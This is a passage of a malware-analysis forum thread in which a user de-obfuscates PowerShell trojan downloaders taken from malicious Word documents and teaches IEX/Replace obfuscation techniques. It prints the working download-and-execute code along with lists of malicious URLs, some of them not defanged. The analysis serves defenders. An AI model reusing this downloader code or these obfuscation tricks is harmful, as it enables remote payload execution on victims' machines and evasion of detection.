    '://r'+'em'+'o'+'nt'+'-s'+'hlangov.ru/Q/,ht'+'tp://www.'+
    'ledpu'+'blic'+'id'+'ad.com/jtvs'+'ZO/''+'.'+'Spli'+
    't('+'I'+'op,Io'+'p);'+'$'+'karapa'+'s'+' = F'+
    'k1'+'nsadas'+'d.next('+'1, 343245);F'+'k'+'1'+
    'huas = $e'+'nv;pu'+'blic + '+'I'+'opa'+'bO''+' '+
    '+ '+'Fk'+'1karapas'+' +'+' I'+'o'+'p.'+
    'exe';foreach(Fk'+'1'+'a'+'bc '+'in'+' F'+'k1bcd){try'+
    '{'+'$'+'franc'+'.D'+'own'+'load'+
    'File($abc.ToS'+'tring(), Fk'+'1huas);Invok'+'e-I'+
    'tem($'+'huas)'+';b'+'re'+'ak;}c'+
    'atch{write-host '+'$_.Exce'+'p'+'tion.Message;}}')
    .
    Now we again will join the code (omit "'+'") and the result will be as follows:
    & ( $pshOme[21]+$PsHOMe[30]+'X') ( ('$franc = new-object System.Net.WebClient;
    Fk1nsadasd = new-object random;$bcd = Iophttp://xn--80ahk9a.xn--p1ai/gPhTZQJ/,
    http://benit.biz/esuBzzmU/,http://remont-britv.ru/UamuKMpu/,http://remont-shlangov.ru/Q/,
    http://www.ledpublicidad.com/jtvsZO/'.Split(Iop,Iop);$karapas = Fk1nsadasd.next(1, 343245);
    Fk1huas = $env;public + IopabO' + Fk1karapas + Iop.exe';foreach(Fk1abc in Fk1bcd)
    {try{$franc.DownloadFile($abc.ToString(), Fk1huas);Invoke-Item($huas);break;}
    catch{write-host $_.Exception.Message;}}')
    .
    The first part of the above code is another way to obfuscate IEX PowerShell command:
    ( $pshOme[21]+$PsHOMe[30]+'X') --> IEX.
    .
    Finally we have to repeat some replacements:
    Iop--> '
    abO --> JVL --> \
    Fk1 --> $
    .
    The final de-obfuscated code:
    IEX ('$franc = new-object System.Net.WebClient;
    $nsadasd = new-object random;$bcd = 'http://xn--80ahk9a.xn--p1ai/gPhTZQJ/,
    http://benit.biz/esuBzzmU/,http://remont-britv.ru/UamuKMpu/,http://remont-shlangov.ru/Q/,

    http://www.ledpublicidad.com/jtvsZO/'.Split(',');$karapas = $nsadasd.next(1, 343245);
    $huas = $env;public + '\' + $karapas + '.exe';foreach($abc in $bcd)
    {try{$franc.DownloadFile($abc.ToString(), $huas);Invoke-Item($huas);break;}
    catch{write-host $_.Exception.Message;}}')
    .
    The code was so obfuscated that those malicious websites were hidden in hybrid-analysis.:)
     
    lowdetection and silversurfer like this.
  17. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #17 Andy Ful, Nov 13, 2017
    Last edited: Nov 13, 2017
    My previous post on the real world example was probably too complex for many readers. So, I prepared here the super-light version of it, that uses most of the techniques adopted by the malware.
    .
    Let's start with the most simple command in the PowerShell console:
    Code:
    Write-Host Hello
    It shows the result:
    Hello
    .
    The same can be done using the string that contains the whole command, which can be executed by IEX (Invoke-Expression cmdlet):
    Code:
    IEX 'Write-Host Hello'
    or placing the IEX from the right side:
    Code:
    'Write-Host Hello' | IEX
    .
    IEX can run the content of more complex strings, for example:
    Code:
    $string = "IEX 'Write-Host Hello'"
    IEX $string
    or placing the IEX from the right side:
    Code:
    $string = "IEX 'Write-Host Hello'"
    $String | IEX
    Still, the result will be:
    Hello
    .
    The string "IEX 'Write-Host Hello'" can be obfuscated in many ways, for example by using some Replace commands:
    Code:
    $ObfuscatedString = "IEX 'Say Hello'"
    $ObfuscatedString.Replace('Say','Write-Host') | IEX
    or in the opened form:
    Code:
    "IEX 'Say Hello'".Replace('Say','Write-Host') | IEX
    We can still get the same result:
    Hello
    .
    Now, it is time to obfuscate IEX and Replace commands in the string:
    Code:
    "REX 'Say Hello'.NewYork('Say','Write-Host')".Replace('R', 'I').Replace('NewYork','Replace') | IEX
    The result is as before:
    Hello
    .
    To make this more complex let's use IEX replacement --> .( $env:pUbLic[13]+$env:puBlIc[5]+'X') :
    (the smiling face hides the ':' and 'p' characters):
    Code:
    "REX 'Say Hello'.NewYork('Say','Write-Host')".Replace('R', 'I').Replace('NewYork','Replace') | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')
    Again, we can see the result:
    Hello
    .
    OK. But, how to de-obfuscate our code:
    Code:
    "REX 'Say Hello'.NewYork('Say','Write-Host')".Replace('R', 'I').Replace('NewYork','Replace') | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')
    .
    First, throw out the execution commands, except those which operate on strings without executing their content. In our case the execution commands are in the last code fragment --> | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')
    .
    The Replace commands are not executing the string content, so they can stay in the code, and the rest of the code is the obfuscated string:
    "REX 'Say Hello'.NewYork('Say','Write-Host')"
    .
    Next use the code to de-obfuscate itself:
    Code:
    $ObfuscatedString = "REX 'Say Hello'.NewYork('Say','Write-Host')"
    $ObfuscatedString.Replace('R', 'I').Replace('NewYork','Replace')
    You will see as the result partially de-obfuscated code:
    IEX 'Say Hello'.Replace('Say','Write-Host')
    .
    Now, the procedure should be repeated. Use the code without IEX:
    Code:
    $ObfuscatedString ='Say Hello'
    $ObfuscatedString.Replace('Say','Write-Host')
    .
    The final result after de-obfuscation:
    Write-Host Hello
    .
    The obfuscated example is interesting, because the de-obfuscation parts of it (Replace commands) are partially obfuscated. So, de-obfuscation was made in two steps.
    .
    Be safe.:)
     
    lowdetection, silversurfer and XhenEd like this.
  18. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    The example from Malware Samples 14-11-17 #10
    whmpqn.doc
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'whmpqn.doc'
    I do not know why hybrid-analysis.com did not decode the PowerShell commands of this malware sample.
    So, I decoded it manually:
    Code:
    $text='IAAoAG4ARQB3AC0AbwBCAEoAZQBjAFQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AdwBlAEIAYwBMAEkARQBOAFQAKQAuAEQAbwBXAG4ATABPAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAOgAvAC8AYQBjAGgAYQByAHkAYQBnAHIAbwB1AHAALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AdQBzAGEALgBlAHgAZQAdICAALAAgAB0gJABlAE4AVgA6AEEAcABwAGQAYQBUAGEAXAB3AGkAbgBkAG8AdwBzAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAHcAaQBuAGQAbwB3AHMALgBlAHgAZQAdIA=='
    
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($text))
    The decoded PowerShell commands:
    .
    (nEw-oBJecT SYsTEm.NEt.weBcLIENT).DoWnLOadfilE( ”http://aaaaa.net/images/usa.exe” , ”$eNV:AppdaTa\windows.exe” ) ; sTArT ”$Env:appdata\windows.exe”
    .
    So, the payload is downloaded from malicious website to the disk (%APPDATA%\windows.exe), and next executed from this location.
     
    XhenEd, silversurfer and lowdetection like this.
  19. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    Malware Samples 16-11-17 #11
    UPS_ 24046767971_SYZ-ZKO (16 Nov 17).doc
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'UPS_ 24046767971_SYZ-ZKO (16 Nov 17).doc'
    .
    The PowerShell code can be found in 'Hybrid Analysis' section (last code block).
    Here is the interesting part:
    .
    Iex 38bsJjVC5sJj+sJjfranc =sJj38b+38b+sJj newsJj+sJj-osJj+sJjbjesJj+sJjct sJj+sJjSystem.NsJj+sJjet.WebsJj+sJjCs38b+38bJj+s38b+38bJjliesJj+sJjnt;VC5sJj+sJjnsJj+sJjssJj+sJjadsJj+sJj38b+38basJj+sJjsd =sJj+sJj new-sJj+sJjobject rans38b+38bJj+sJjdom;Vs38b+38bJj+sJjC5bcsJj+sJjd =38b+38bsJj+sJj ZIsJj+sJj38b+38bxhttp:/sJj+sJj/sJj+sJjcamdoyenvien.sJj+sJjcomsJj+s38b+38bJj/TFb/,hsJj+sJjttp:sJj+sJj//me38b+38bgustasJj+sJjse38b+38bsJj+sJjrcsJj+s38b+38bJjosJj+sJjach.com/J/,htsJj+sJjtsJj38b+38b+sJjp://tesJj+sJjst.m1kasJj+sJjelsJj+sJj.ru/NrsJj+sJjtWVsJj+sJjfs/,httsJj+sJjp:38b+38bsJj+sJj//expsJj+sJjertmesJj+sJjdisJ38b+38bj+sJjator.sJj+sJjca/S/,hsJj+sJjt38b+38bsJj+sJjtp://sJj+sJjtsJj+sJjrosJj+sJjvatosJj+sJjurssJj+sJj.sJj+sJj38b+38bessJj+sJj/j/ZIsJj+sJjx.SplitsJj+sJjZsJj+sJ38b+38bj38b+38bIs38b+38bJj+sJjx,ZIxsJj+sJj;VC5k38b+38barasJ38b+38bj+sJ38b+38bjpasJj+sJjs sJj+sJj= VC5nsadassJj+sJjd.sJj+sJjnsJj+sJjexsJj+sJjtsJj+sJj1sJj+sJj, 3sJj+sJj43245sJj+sJj;VC538b+38bsJj+sJjhuassJj+sJj sJj+sJ38b+38bj= VC5esJj+sJjnv;public s38b+38bJj+sJj+sJj+sJj ZIsJj+sJjx4MnZIx + VsJj+sJjCsJj+sJj5karapsJj+sJjas sJj+sJj+ s38b+38bJj+sJjZs38b+38bJj+sJjIsJj+sJjx.esJj+sJjxesJj+sJjZsJj+sJjIxsJj+sJj;sJj+sJjfosJj38b+38b+sJjreachsJj+38b+38bsJjVC5absJj+sJjc sJj+sJj38b+38bin V38b+38bC5sJj+sJjbsJj+sJjcdsJj+sJj{tsJj+sJjry{V38b+38bCsJj+s38b+38bJj5fsJj+sJjrasJj+sJjn38b+38bc.DownsJj+sJjlsJj+sJjoasJj+sJjdFilesJj+sJjVC5asJj+sJjbsJj+sJjc.Ts38b+38bJj+sJjoStsJj+sJjrinsJj+sJjgs38b+38bJj+sJjsJj+sJj, VsJj+sJj38b+38bC5sJj+sJjhusJj+sJjassJj+sJj;InsJ38b+38bj+sJjvoke-Ite38b+38bmsJj+sJjVsJj+sJjC5huas;break;}catch{writ38b+38be-hosJj+sJjstsJj+sJj VC5sJj+sJj_.EsJj+sJjxceptsJj+sJjisJj+sJjon.Message;}}sJj -cREpL38b+38bace 'V'+[cHar]67+'5','$'-cREp38b+38bLace'4Mn','\'-rePLace sJjZIxsJj,''' t38b+38bh38b+38bw . g38b+38ba0ShellID[1]+ga0ShelLId[13]+sJjxsJj38b.rePlaCE'ga'+[CHAr]48,[stRinG][CHAr]36.rePlaCE[CHAr]115+'Jj','''.rePlaCE38bthw38b,'|''-cREPlaCE'38b','''
    .
    The 7 REPLACE commands were bolded, and the obfuscated IEX (Invoke-Expression cmdlet) was written in the red color.
    The decoding part is very similar to the malware from my previous post How-to Guide - How to de-obfuscate PowerShell script commands (Examples)., so the below is a maximally shortened version of three de-obfuscating stages (omitted details):
    .
    Stage 1
    Omit the Iex (first command), and represent the above code block in the form: $text.REPLACE('38b',"'")
    Execute in PowerShell console:
    $text.REPLACE('38b',"'")
    Decode ASCII chars in REPLACE commands. Join the code.
    .
    Stage 2
    Represent the results of 'Stage 1' in the form: $text1.REPLACE('ga0','$').REPLACE('sJj',"'").REPLACE('thw','|')
    Execute in PowerShell console:
    $text1.REPLACE('ga0','$').REPLACE('sJj',"'").REPLACE('thw','|')
    Join the code.
    .
    Stage 3
    Omit the | . 'IEX' replacement | .$ShellID[1]+$ShelLId[13]+'x'
    Represent the results of 'Stage 2' in the form: $text2.REPLACE('VC5','$').REPLACE('4Mn','\').REPLACE( 'ZIx',"'")
    Execute in PowerShell console:
    $text2.REPLACE('VC5','$').REPLACE('4Mn','\').REPLACE( 'ZIx',"'")
    Join the code.
    .
    The result:
    .
    $franc = new-object System.Net.WebClient; $nsadasd = new-object random; $bcd = 'hxxx;//camdoyenvien.com/TFb/,hxxx;//megustasercoach.com/J/,hxxx;//test.m1kael.ru/NrtWVfs/,hxxx;//expertmediator.ca/S/,hxxx;//trovatours.es/j/'.Split(','); $karapas = $nsadasd.next(1, 343245); $huas = $env;public + '\' + $karapas + '.exe'; foreach $abc in $bcd {try{$franc.DownloadFile$abc.ToString, $huas; Invoke-Item $huas; break;}catch{write-host $_.Exception.Message;}}
    .
    The above code is almost identical to the final code of the malware from the previous post.
     
    silversurfer likes this.
  20. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,092
    4,677
    business
    Poland
    Windows 10
    Microsoft
    #20 Andy Ful, Dec 15, 2017
    Last edited: Dec 15, 2017
    Malware Pack (20+) 15.12.2017 - #24
    Invoice.doc

    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'Invoice.doc'
    .
    I had a break because there was nothing new on obfuscated scripts. So, maybe it would be interesting to take the simple de-obfuscation method for REPLACE obfuscation.
    The method is the simplest one. We make a look at the ofuscated script, and delete the most frequent repetitions which are not native to PowerShell code.
    .
    Code:
    powershell "((' ((Vpa (A64Y0A64+A64QfranAVpa+Vpa64+A64c =
    Vpa+Vpa neA64+A64wA64+A64-'+'A64+A64objA64+A64ectA64+A64
    SyA64+A64s'+'A6'+'4+A64teA64+A64m.NeA64+A64t.A64+A64WebCA64+A6'+'4lienA64+A64t;Y0QnsadasA64+A64d = new-oA64+A64bject randoA64+A64mA64+A64;YA64+A6'+'40QbcdA64+A64 A64+A64=
    7BkhttpA64+AVpa+Vpa64://vi'+'n-diA64+A64ng-rijA64+A64k.nl/zNUvgA64+A64'+'HA64+A64/A64+A64,
    '+'http://ep'+'rA64+A6Vpa+Vpa4oA64+A64tuA64+A64tA64'+'+A64oA64+A64Vpa+VparsA64Vpa'+'+Vpa+A64.
    coA64+A64m/7UA64+A64doA64+A64/AVpa+Vpa64+A64,httpA64+A64:A64+A64//crA64+A64eumAVpa+Vpa64
    +A64atproA64+AVpa+Vpa64pertiA'+'64+A'+'Vpa+Vpa64es.com/nUvMA64+A64E/,hA64'+'+A64ttpA6'+'4+A64:
    A64+A64//perfA64+A64ecA64+A64tprA64+A64essing.nVpa+VpaeA64+AVpa+Vpa64t/HVp'+'a+VpaB'+'h0/,htA6'+'4+
    A64tA64+A64p:/A64+Vpa+VpaA64/A64+A64pA64+A64lat'+'foA64+A64rmf.Vpa+VpaA64+A64nl/Vpa+VpayA64+
    A64jYFA64+A64LA64+AVpa+Vpa'+'6406/7Bk.A64+'+'A6'+'4SA64+A64pA64+A64lA64+A64iA6Vpa+Vpa4+A64tA64
    +A64'+'(7Bk,7BA64+A64k);Y'+'Vpa+Vpa0QkA64+A64Vpa+V'+'paarapA64+A64asA64Vpa+Vpa+A64
    A64+A6Vpa+Vpa4= A64+A64Y0QnsadA64+A64aVpa+VpaA64'+'+A64sd.nA64+A64ext
    (A6Vpa+Vpa4+A641A64+A64, 3A64+A6443245A64+A64);YA64+A640QhuA64+A64as =A64+A64
    Y0QeA64+A64nvA64+A64:pA64+A64'+'ubli'+'c + A64+A647BkA6Vpa+Vpa4+A64CpVpa+VpaA64+A6447Bk
    A6Vpa+Vpa4+'+'A64+A64'+'+A64 Y'+'A64+A6Vpa'+'+Vpa40Q'+'ka'+'rapa'+'sA64+A64 + 7Bk.exe7Bk;foreach
    (Y0QA64+A64abc A64+A64iA64+A64nA64+A64 '+'YA64+A640'+'QA64+A64bc'+'d)'+'A64+A64{tryA64+A64
    {Y0QfA64'+'+A'+'64'+'rA64+A64an'+'cA6'+'4+A64.DowA6Vpa+Vpa4+A64nlA64+A64oadFile
    (Y0Qabc.ToStVpa+VparA64+A64iA64+AVpa+V'+'pa64n'+'g(), Y0'+'QA64+A64hAV'+'pa
    +Vpa64+Vpa+VpaA64Vpa+Vpauas);In'+'vA64'+'+A64oke-Vpa+VpaIVp'+'a+VpatA64+A64em
    (YA64+A640QhA64+A64uVpa+VpaaA64Vpa+Vpa'+'+A64s)A64+A64;br'+'eaA64+A64k;}ca'+'tch
    {A64+A64wriVp'+'a+VpaA64+A6Vpa+Vpa4te-host
    Y'+'0A'+'64+A64Q_.A64+A64ExceptA64+A64ion.MessA64+A64age;}}A64).RePlAcE(([cVpa+VpahaR]89+
    [chVpa'+'+VpaaR]48+[chaR]81),[sTrING][chaR]36).RePlAcE(([chaR]67+[Vpa+VpachaR]112+Vpa+Vpa[chaR]
    52),AVpa+Vpa64p87A64Vpa+Vpa).RePlAcE(([chaR]5Vpa+Vpa5+[chaR]66+[chaR]107),[sTrING]
    ['+'chaVpa+VpaR]39)CLE. ( xPbsHeLLid[1]+xPbSheLlId[13]+A64xA64)Vpa) -CREpLacE VpaCLEVpa,[CHar]
    124 -RePlaCe Vpap87'+'Vpa,[CHar]92 -CREpLa'+'cE([CHar]120+[CHar]80+[CHar]98),['+'CHar]36 -
    CREpLacE VpaA64Vpa,[CHar]39) QmWIex')-REPLaCe 'QmW',[CHar]124 -crepLace'Vpa',[CHar]39) |& (
    $pSHoMe[4]+$PSHOMe[34]+'X')
    So let's begin. There are many occurences of A64, Vpa, '+', + and some others. We may copy the above code (up to the first Replace command) to TXT file in notepad and use Replace feature in the notepad to delete occurrences:

    .
    Replace '+' with nothing
    Replace + with nothing
    Replace A64 with nothing
    Replace Vpa with nothing
    Replace 7Bk with nothing
    Replace Y0Q with nothing
    Replace AVp with nothing
    Repeat the above if necessary.

    .
    The result:
    powershell "((' (( (franc = new-object System.Net.WebClient;nsadasd = new-object random;bcd = http://vin-ding-rijk.nl/zNUvgH/,hxxp://eprotutors.com/7Udo/,http://creumAtproperties.com/nUvME/,hxxp://perfectpressing.net/HBh0/,hxxp://platformf.nl/yjYFL06/.Split(,);karapas = nsadasd.next(1, 343245);huas = env;public Cp4 karapas .exe;foreach(abc in bcd){try{franc.DownloadFile(abc.ToString(), huas);Invoke-Item(huas);break;}catch{write-host _.Exception.Message;}});
    .
    It is not the code that could be run, but we can see all interesting features. The script after de-obfuscation looks identical (except links to malicious websites) as the script from the previous post.
    The bolded code fragments mean that the script uses System.Net.WebCient.DownloadFile command to download randomly (new-object random) the payload from one of the malicious websites, and executes it. So, this is the well known trojan downloader:)
     
Loading...
Similar Threads Forum Date
Add-on AdNauseam v3 - Obfuscate your browsing data Browsers and Extensions Jul 21, 2017
Malware Analysis 5 samples - download the real obfuscated Jscript code used to download 2 payloads- Jan,13 2017 Malware Analysis Dec 16, 2016
Malware Analysis 666.js JS/Nemucod.9C70!tr.dldr - obfuscated payload downloaded : OSIRIS locky ransomware Malware Analysis Dec 8, 2016